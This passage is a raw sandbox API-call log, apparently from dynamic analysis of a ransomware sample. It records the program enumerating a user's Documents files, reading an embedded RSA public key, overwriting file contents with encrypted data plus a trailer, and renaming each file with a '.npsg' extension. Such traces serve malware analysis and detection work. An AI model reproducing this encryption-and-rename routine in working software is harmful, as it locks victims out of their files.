lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.586] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.586] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.586] CloseHandle (hObject=0x644) returned 1 [0237.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0237.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.589] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\qWv5zMVx3eF_fs53v.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\qwv5zmvx3ef_fs53v.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\qWv5zMVx3eF_fs53v.odp.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\qwv5zmvx3ef_fs53v.odp.npsg")) returned 1 [0237.590] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfea73370, ftCreationTime.dwHighDateTime=0x1d5b768, ftLastAccessTime.dwLowDateTime=0xb5fd4fb0, ftLastAccessTime.dwHighDateTime=0x1d5b871, ftLastWriteTime.dwLowDateTime=0xb5fd4fb0, ftLastWriteTime.dwHighDateTime=0x1d5b871, nFileSizeHigh=0x0, nFileSizeLow=0x7148, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xdvtmhR5usy.pdf", cAlternateFileName="XDVTMH~1.PDF")) returned 1 [0237.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ceb0 [0237.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x64e690 [0237.590] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\xdvtmhR5usy.pdf") returned=".pdf" [0237.590] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\xdvtmhR5usy.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\xdvtmhr5usy.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.591] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=29000) returned 1 [0237.591] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.593] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7122, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.593] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.595] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.595] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x7148, lpOverlapped=0x0) returned 1 [0237.596] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.596] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.596] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.596] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.596] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0237.597] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.597] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.597] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.597] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.597] GetLastError () returned 0x0 [0237.597] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.597] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0237.597] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.597] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.597] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.597] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.597] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.597] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400710 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006c8 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34006b0 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.598] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.598] GetCurrentThreadId () returned 0x5b4 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b82678 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.599] GetCurrentThreadId () returned 0x5b4 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0237.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0237.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400710 [0237.599] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0237.599] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006b0 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006c8 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400698 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400728 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006f8 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34006e0 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400740 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006e0 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006f8 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0237.600] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0237.600] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0237.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34006b0 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0237.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400710 | out: hHeap=0x620000) returned 1 [0237.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7ba60 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400740 | out: hHeap=0x620000) returned 1 [0237.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7b830 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0237.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006b0 | out: hHeap=0x620000) returned 1 [0237.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0237.601] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0237.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006e0 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400728 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34006c8 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400698 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400680 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409368 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.602] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.602] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x7143, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb14*=0x7143, lpOverlapped=0x0) returned 1 [0237.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.603] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7148, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.603] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0237.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ceb0 [0237.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0237.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0237.603] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0237.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ceb0 | out: hHeap=0x620000) returned 1 [0237.603] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0237.603] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.603] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.603] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.603] CloseHandle (hObject=0x644) returned 1 [0237.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0237.605] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b83cd0 [0237.605] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0237.605] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\xdvtmhR5usy.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\xdvtmhr5usy.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\xdvtmhR5usy.pdf.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\xdvtmhr5usy.pdf.npsg")) returned 1 [0237.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0237.606] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.606] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.607] 